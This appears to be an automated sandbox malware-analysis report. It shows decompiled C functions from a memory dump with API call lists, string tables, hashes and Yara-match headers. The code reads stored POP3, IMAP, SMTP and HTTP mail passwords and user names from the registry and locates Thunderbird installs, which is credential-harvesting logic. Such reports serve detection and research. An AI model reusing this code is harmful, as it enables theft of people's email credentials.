						E0040242B(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E004023C6(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}




















                                                                                                                                                                  0x004025c5
                                                                                                                                                                  0x004025c5
                                                                                                                                                                  0x004025c6
                                                                                                                                                                  0x004025ca
                                                                                                                                                                  0x004025d3
                                                                                                                                                                  0x004025da
                                                                                                                                                                  0x004025e1
                                                                                                                                                                  0x004025e8
                                                                                                                                                                  0x004025ef
                                                                                                                                                                  0x004025f6
                                                                                                                                                                  0x004025fd
                                                                                                                                                                  0x00402604
                                                                                                                                                                  0x0040260b
                                                                                                                                                                  0x00402612
                                                                                                                                                                  0x00402619
                                                                                                                                                                  0x00402620
                                                                                                                                                                  0x00402627
                                                                                                                                                                  0x0040262e
                                                                                                                                                                  0x00402635
                                                                                                                                                                  0x0040263c
                                                                                                                                                                  0x00402643
                                                                                                                                                                  0x0040264a
                                                                                                                                                                  0x00402651
                                                                                                                                                                  0x00402658
                                                                                                                                                                  0x0040265f
                                                                                                                                                                  0x00402661
                                                                                                                                                                  0x00402669
                                                                                                                                                                  0x0040266d
                                                                                                                                                                  0x00402675
                                                                                                                                                                  0x00402678
                                                                                                                                                                  0x0040267b
                                                                                                                                                                  0x0040267f
                                                                                                                                                                  0x00402684
                                                                                                                                                                  0x00402685
                                                                                                                                                                  0x0040268a
                                                                                                                                                                  0x0040268f
                                                                                                                                                                  0x0040269b
                                                                                                                                                                  0x004026ab
                                                                                                                                                                  0x004026b3
                                                                                                                                                                  0x004026b6
                                                                                                                                                                  0x004026bc
                                                                                                                                                                  0x004026bf
                                                                                                                                                                  0x004026cb
                                                                                                                                                                  0x004026cc
                                                                                                                                                                  0x004026d0
                                                                                                                                                                  0x004026d3
                                                                                                                                                                  0x004026d4
                                                                                                                                                                  0x004026df
                                                                                                                                                                  0x004026e0
                                                                                                                                                                  0x004026e5
                                                                                                                                                                  0x004026e8
                                                                                                                                                                  0x004026e9
                                                                                                                                                                  0x004026f4
                                                                                                                                                                  0x004026f5
                                                                                                                                                                  0x004026fa
                                                                                                                                                                  0x004026fd
                                                                                                                                                                  0x004026fe
                                                                                                                                                                  0x00402703
                                                                                                                                                                  0x00402709
                                                                                                                                                                  0x00402711
                                                                                                                                                                  0x00402712
                                                                                                                                                                  0x00402717
                                                                                                                                                                  0x0040271a
                                                                                                                                                                  0x0040271b
                                                                                                                                                                  0x00402720
                                                                                                                                                                  0x00402720
                                                                                                                                                                  0x0040272c
                                                                                                                                                                  0x0040273a
                                                                                                                                                                  0x0040273f
                                                                                                                                                                  0x00402750
                                                                                                                                                                  0x00402755
                                                                                                                                                                  0x00402768
                                                                                                                                                                  0x0040276e
                                                                                                                                                                  0x00402776
                                                                                                                                                                  0x00402776
                                                                                                                                                                  0x0040277b
                                                                                                                                                                  0x0040277c
                                                                                                                                                                  0x0040278c

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040266D
                                                                                                                                                                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,7479ED80,?,00000000), ref: 004026AB
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00402768
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$QueryValuememset
                                                                                                                                                                  • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                  • API String ID: 3373037483-1627711381
                                                                                                                                                                  • Opcode ID: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                  • Instruction ID: 73c24e987151304ffccade67a91af9495e30ddb8d36a1dc6faba254672d7bb93
                                                                                                                                                                  • Opcode Fuzzy Hash: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                                                                                                                                                                  • Instruction Fuzzy Hash: 534143B190021CBEDB31DF51CD49ADE7BA8AF04348F50457BF918A7291D3799A88CF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040278F, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 117stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E0040278F(void* __fp0) {
				void* __esi;
				void* _t66;
				signed int _t95;
				void* _t98;
				intOrPtr _t107;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t119;

				_t119 = __fp0;
				_t109 = _t111 - 0x70;
				_t112 = _t111 - 0x474;
				 *(_t109 + 0x40) = "POP3 Password";
				 *(_t109 + 0x44) = "IMAP Password";
				 *(_t109 + 0x48) = "HTTP Password";
				 *(_t109 + 0x4c) = "SMTP Password";
				 *(_t109 + 0x50) = "POP3 User";
				 *(_t109 + 0x54) = "IMAP User";
				 *(_t109 + 0x58) = "HTTP User";
				 *(_t109 + 0x5c) = "SMTP User";
				 *(_t109 + 0x20) = "POP3 Server";
				 *(_t109 + 0x24) = "IMAP Server";
				 *(_t109 + 0x28) = "HTTP Server URL";
				 *(_t109 + 0x2c) = "SMTP Server";
				 *(_t109 + 0x30) = "POP3 Port";
				 *(_t109 + 0x34) = "IMAP Port";
				 *(_t109 + 0x38) = "HTTP Port";
				 *(_t109 + 0x3c) = "SMTP Port";
				 *(_t109 + 0x60) = "POP3 Use SPA";
				 *(_t109 + 0x64) = "IMAP Use SPA";
				 *(_t109 + 0x68) = "HTTPMail Use SSL";
				 *(_t109 + 0x6c) = "SMTP Use SSL";
				_t95 = 0;
				do {
					 *(_t109 - 0x60) = 0;
					memset(_t109 - 0x5f, 0, 0x7f);
					_t112 = _t112 + 0xc;
					_t103 = _t95 << 2;
					_t66 = E00402963(_t109 - 0x60,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + (_t95 << 2) + 0x50)));
					if(_t66 != 0) {
						E00402197(_t109 - 0x404);
						strcpy(_t109 - 0x1f0, _t109 - 0x60);
						_t107 =  *((intOrPtr*)(_t109 + 0x78));
						_pop(_t98);
						 *((intOrPtr*)(_t109 - 0x378)) =  *((intOrPtr*)(_t107 + 0xb1c));
						_t37 = _t95 + 1; // 0x1
						 *((intOrPtr*)(_t109 - 0x1f4)) = _t37;
						E00402963(_t109 - 0x2f4,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x20)));
						E00402963(_t109 - 0x3f8,  *((intOrPtr*)(_t109 + 0x7c)), "Display Name");
						E00402963(_t109 - 0x374,  *((intOrPtr*)(_t109 + 0x7c)), "Email");
						if(_t95 != 3) {
							E00402963(_t109 - 0x274,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Server");
							E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)), "SMTP Port", _t109 - 0x68);
							_t112 = _t112 + 0xc;
						}
						E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x30)), _t109 - 0x70);
						E0040F1CA(_t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x60)), _t109 - 0x6c);
						_t112 = _t112 + 0x18;
						E0040242B(_t107, _t98,  *((intOrPtr*)(_t109 + 0x7c)),  *((intOrPtr*)(_t109 + _t103 + 0x40)), _t109 - 0x170, 1);
						strcpy(_t109 - 0xf0, _t107 + 0xa9c);
						_t66 = E004023C6(_t109 - 0x404, _t119, _t107);
					}
					_t95 = _t95 + 1;
				} while (_t95 < 4);
				return _t66;
			}












                                                                                                                                                                  0x0040278f
                                                                                                                                                                  0x00402790
                                                                                                                                                                  0x00402794
                                                                                                                                                                  0x0040279d
                                                                                                                                                                  0x004027a4
                                                                                                                                                                  0x004027ab
                                                                                                                                                                  0x004027b2
                                                                                                                                                                  0x004027b9
                                                                                                                                                                  0x004027c0
                                                                                                                                                                  0x004027c7
                                                                                                                                                                  0x004027ce
                                                                                                                                                                  0x004027d5
                                                                                                                                                                  0x004027dc
                                                                                                                                                                  0x004027e3
                                                                                                                                                                  0x004027ea
                                                                                                                                                                  0x004027f1
                                                                                                                                                                  0x004027f8
                                                                                                                                                                  0x004027ff
                                                                                                                                                                  0x00402806
                                                                                                                                                                  0x0040280d
                                                                                                                                                                  0x00402814
                                                                                                                                                                  0x0040281b
                                                                                                                                                                  0x00402822
                                                                                                                                                                  0x00402829
                                                                                                                                                                  0x0040282b
                                                                                                                                                                  0x00402833
                                                                                                                                                                  0x00402837
                                                                                                                                                                  0x0040283c
                                                                                                                                                                  0x00402841
                                                                                                                                                                  0x0040284e
                                                                                                                                                                  0x00402855
                                                                                                                                                                  0x00402861
                                                                                                                                                                  0x00402871
                                                                                                                                                                  0x00402876
                                                                                                                                                                  0x00402880
                                                                                                                                                                  0x00402885
                                                                                                                                                                  0x0040288e
                                                                                                                                                                  0x00402891
                                                                                                                                                                  0x0040289d
                                                                                                                                                                  0x004028b0
                                                                                                                                                                  0x004028c3
                                                                                                                                                                  0x004028cb
                                                                                                                                                                  0x004028db
                                                                                                                                                                  0x004028ec
                                                                                                                                                                  0x004028f1
                                                                                                                                                                  0x004028f1
                                                                                                                                                                  0x004028ff
                                                                                                                                                                  0x0040290f
                                                                                                                                                                  0x00402914
                                                                                                                                                                  0x00402929
                                                                                                                                                                  0x0040293c
                                                                                                                                                                  0x0040294a
                                                                                                                                                                  0x0040294a
                                                                                                                                                                  0x0040294f
                                                                                                                                                                  0x00402950
                                                                                                                                                                  0x00402960

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00402837
                                                                                                                                                                    • Part of subcall function 00402963: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 00402994
                                                                                                                                                                  • strcpy.MSVCRT(?,?,7479ED80,?,00000000), ref: 00402871
                                                                                                                                                                    • Part of subcall function 00402963: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029C2
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,7479ED80,?,00000000), ref: 0040293C
                                                                                                                                                                    • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValuestrcpy$ByteCharMultiWidememset
                                                                                                                                                                  • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                  • API String ID: 1302727986-4086712241
                                                                                                                                                                  • Opcode ID: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                                                                                                                                                                  • Instruction ID: 308be4cc5b828d0a3e021f21c5187f9384b0cc6d4098b7245e54e25f5b72303c
                                                                                                                                                                  • Opcode Fuzzy Hash: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                                                                                                                                                                  • Instruction Fuzzy Hash: D9410BB150024DABCF21EF61DD499DD7BA9FF04309F10816BF92466291D3B99A89CF48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FAA6, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E0040FAA6(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040F1B0(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040FA2B(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E0040617C(_t89);
							if(E0040FA2B(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040FA2B(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040F276(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00412114();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00412108();
							E0040F232(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041210E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040FA2B( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L0041207E();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040F276(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}



























                                                                                                                                                                  0x0040faba
                                                                                                                                                                  0x0040fac4
                                                                                                                                                                  0x0040faca
                                                                                                                                                                  0x0040fadc
                                                                                                                                                                  0x0040fae2
                                                                                                                                                                  0x0040faf5
                                                                                                                                                                  0x0040faf7
                                                                                                                                                                  0x0040fafc
                                                                                                                                                                  0x0040fb01
                                                                                                                                                                  0x0040fc57
                                                                                                                                                                  0x0040fc5f
                                                                                                                                                                  0x0040fc68
                                                                                                                                                                  0x0040fc71
                                                                                                                                                                  0x0040fc7f
                                                                                                                                                                  0x0040fc81
                                                                                                                                                                  0x0040fc81
                                                                                                                                                                  0x0040fc85
                                                                                                                                                                  0x0040fc87
                                                                                                                                                                  0x0040fc94
                                                                                                                                                                  0x0040fc96
                                                                                                                                                                  0x0040fc96
                                                                                                                                                                  0x0040fc9a
                                                                                                                                                                  0x0040fc9e
                                                                                                                                                                  0x0040fcac
                                                                                                                                                                  0x0040fcae
                                                                                                                                                                  0x0040fcae
                                                                                                                                                                  0x0040fcac
                                                                                                                                                                  0x0040fc9a
                                                                                                                                                                  0x0040fc85
                                                                                                                                                                  0x0040fcbb
                                                                                                                                                                  0x0040fb07
                                                                                                                                                                  0x0040fb14
                                                                                                                                                                  0x0040fb1a
                                                                                                                                                                  0x0040fb2a
                                                                                                                                                                  0x0040fb2d
                                                                                                                                                                  0x0040fb32
                                                                                                                                                                  0x0040fc46
                                                                                                                                                                  0x0040fb3a
                                                                                                                                                                  0x0040fb3c
                                                                                                                                                                  0x0040fb42
                                                                                                                                                                  0x0040fb47
                                                                                                                                                                  0x0040fb48
                                                                                                                                                                  0x0040fb4d
                                                                                                                                                                  0x0040fb52
                                                                                                                                                                  0x0040fb61
                                                                                                                                                                  0x0040fb67
                                                                                                                                                                  0x0040fb79
                                                                                                                                                                  0x0040fb7f
                                                                                                                                                                  0x0040fb8a
                                                                                                                                                                  0x0040fb8b
                                                                                                                                                                  0x0040fb96
                                                                                                                                                                  0x0040fb9b
                                                                                                                                                                  0x0040fb9c
                                                                                                                                                                  0x0040fbb8
                                                                                                                                                                  0x0040fbbd
                                                                                                                                                                  0x0040fbc3
                                                                                                                                                                  0x0040fbc5
                                                                                                                                                                  0x0040fbc6
                                                                                                                                                                  0x0040fbcb
                                                                                                                                                                  0x0040fbd0
                                                                                                                                                                  0x0040fbd2
                                                                                                                                                                  0x0040fbd2
                                                                                                                                                                  0x0040fbda
                                                                                                                                                                  0x0040fbf2
                                                                                                                                                                  0x0040fbf3
                                                                                                                                                                  0x0040fbfa
                                                                                                                                                                  0x0040fc02
                                                                                                                                                                  0x0040fc03
                                                                                                                                                                  0x0040fc13
                                                                                                                                                                  0x0040fc26
                                                                                                                                                                  0x0040fc2b
                                                                                                                                                                  0x0040fc2b
                                                                                                                                                                  0x0040fc03
                                                                                                                                                                  0x0040fbda
                                                                                                                                                                  0x0040fc2e
                                                                                                                                                                  0x0040fc3e
                                                                                                                                                                  0x0040fc43
                                                                                                                                                                  0x0040fc43
                                                                                                                                                                  0x0040fc51
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fc51

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040FACA
                                                                                                                                                                  • memset.MSVCRT ref: 0040FAE2
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  • memset.MSVCRT ref: 0040FB1A
                                                                                                                                                                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                  • _mbsnbicmp.MSVCRT ref: 0040FB48
                                                                                                                                                                  • memset.MSVCRT ref: 0040FB67
                                                                                                                                                                  • memset.MSVCRT ref: 0040FB7F
                                                                                                                                                                  • _snprintf.MSVCRT ref: 0040FB9C
                                                                                                                                                                  • _mbsrchr.MSVCRT ref: 0040FBC6
                                                                                                                                                                  • _mbsicmp.MSVCRT ref: 0040FBFA
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?), ref: 0040FC13
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040FC26
                                                                                                                                                                  • RegCloseKey.ADVAPI32(0040FD0A), ref: 0040FC51
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC5F
                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040FC71
                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC9E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                                  • API String ID: 3269028891-3267283505
                                                                                                                                                                  • Opcode ID: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                                                                                                                                                                  • Instruction ID: 1ceab4daf47746688ac62aede77486c23684b0aa94ce4f67dad83c1e3abd437f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                                                                                                                                                                  • Instruction Fuzzy Hash: 3851C67194515DBEDB31E7A18D42EDB7BACAF14304F0004FAB684F2141EA789FC98B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F797, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                  			E0040F797(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F6E2(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}













                                                                                                                                                                  0x0040f797
                                                                                                                                                                  0x0040f7b2
                                                                                                                                                                  0x0040f7b8
                                                                                                                                                                  0x0040f7c6
                                                                                                                                                                  0x0040f7cc
                                                                                                                                                                  0x0040f7d1
                                                                                                                                                                  0x0040f7d8
                                                                                                                                                                  0x0040f7df
                                                                                                                                                                  0x0040f7e6
                                                                                                                                                                  0x0040f7e6
                                                                                                                                                                  0x0040f7ec
                                                                                                                                                                  0x0040f7ef
                                                                                                                                                                  0x0040f7f1
                                                                                                                                                                  0x0040f7f9
                                                                                                                                                                  0x0040f7fe
                                                                                                                                                                  0x0040f805
                                                                                                                                                                  0x0040f814
                                                                                                                                                                  0x0040f821
                                                                                                                                                                  0x0040f826
                                                                                                                                                                  0x0040f826
                                                                                                                                                                  0x0040f829
                                                                                                                                                                  0x0040f82f
                                                                                                                                                                  0x0040f84b
                                                                                                                                                                  0x0040f858
                                                                                                                                                                  0x0040f85d
                                                                                                                                                                  0x0040f866
                                                                                                                                                                  0x0040f86c
                                                                                                                                                                  0x0040f870
                                                                                                                                                                  0x0040f878
                                                                                                                                                                  0x0040f87e
                                                                                                                                                                  0x0040f883
                                                                                                                                                                  0x0040f88d
                                                                                                                                                                  0x0040f895
                                                                                                                                                                  0x0040f89b
                                                                                                                                                                  0x0040f89f
                                                                                                                                                                  0x0040f8a7
                                                                                                                                                                  0x0040f8ad
                                                                                                                                                                  0x0040f8b3

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040F7B8
                                                                                                                                                                  • memset.MSVCRT ref: 0040F7CC
                                                                                                                                                                  • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F7F9
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040F814
                                                                                                                                                                  • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F821
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040F84B
                                                                                                                                                                  • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F858
                                                                                                                                                                  • strcat.MSVCRT(?,00414E74,?,?,?,?,?), ref: 0040F866
                                                                                                                                                                  • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F878
                                                                                                                                                                  • strcat.MSVCRT(?,004097A4,?,?,?,?,?), ref: 0040F883
                                                                                                                                                                  • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F895
                                                                                                                                                                  • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F8A7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcat$memsetsprintf$strcpy
                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                  • API String ID: 1662040868-1996832678
                                                                                                                                                                  • Opcode ID: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                                                                                                                                                                  • Instruction ID: 1d89f71d6803e1250473f580c1fd87552222ed23aec69fbe6c7d3cec9cc88889
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                                                                                                                                                                  • Instruction Fuzzy Hash: C731E673905714AEC720AA659D42DCBB76CAF14324F1082BFF214A2182D7BC9AD4CA9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B031, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040B031(void* __eax, intOrPtr _a4) {
				char _v271;
				char _v532;
				intOrPtr _v536;
				char _v540;
				void _v803;
				char _v804;
				void* __ebx;
				void* __edi;
				char* _t47;
				intOrPtr _t67;
				WINDOWPLACEMENT* _t73;
				void* _t75;
				char* _t83;
				struct HWND__* _t84;
				intOrPtr _t88;
				int _t90;

				_t75 = __eax;
				_v804 = 0;
				memset( &_v803, 0, 0x104);
				GetModuleFileNameA(0,  &_v804, 0x104);
				_t47 = strrchr( &_v804, 0x2e);
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				strcat( &_v804, ".cfg");
				_v536 = _a4;
				_v540 = 0x414c5c;
				_v532 = 0;
				_v271 = 0;
				strcpy( &_v532,  &_v804);
				strcpy( &_v271, "General");
				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
				_t16 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t16 + 4))("ShowGridLines", _t88 + 4, 0);
				_t20 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t20 + 8))("SaveFilterIndex", _t88 + 8, 0);
				_t24 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t24 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
				_t27 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t27 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
				_t67 = _v536;
				_a4 = _t67;
				_t90 = 0x2c;
				if(_t67 != 0) {
					_t84 =  *(_t75 + 0x108);
					if(_t84 != 0) {
						_t73 = _t75 + 0x128;
						_t73->length = _t90;
						GetWindowPlacement(_t84, _t73);
					}
				}
				_t35 =  &_v540; // 0x414c5c
				_t36 =  &_v540; // 0x414c5c
				_t83 = _t36;
				 *((intOrPtr*)( *_t35 + 0xc))("WinPos", _t75 + 0x128, _t90);
				if(_a4 == 0) {
					E00401823(_t75);
				}
				_t40 =  &_v540; // 0x414c5c
				return E004087DB( *((intOrPtr*)(_t75 + 0x370)), _t83, _t40);
			}



















                                                                                                                                                                  0x0040b043
                                                                                                                                                                  0x0040b04f
                                                                                                                                                                  0x0040b056
                                                                                                                                                                  0x0040b067
                                                                                                                                                                  0x0040b076
                                                                                                                                                                  0x0040b07f
                                                                                                                                                                  0x0040b081
                                                                                                                                                                  0x0040b081
                                                                                                                                                                  0x0040b090
                                                                                                                                                                  0x0040b098
                                                                                                                                                                  0x0040b0ac
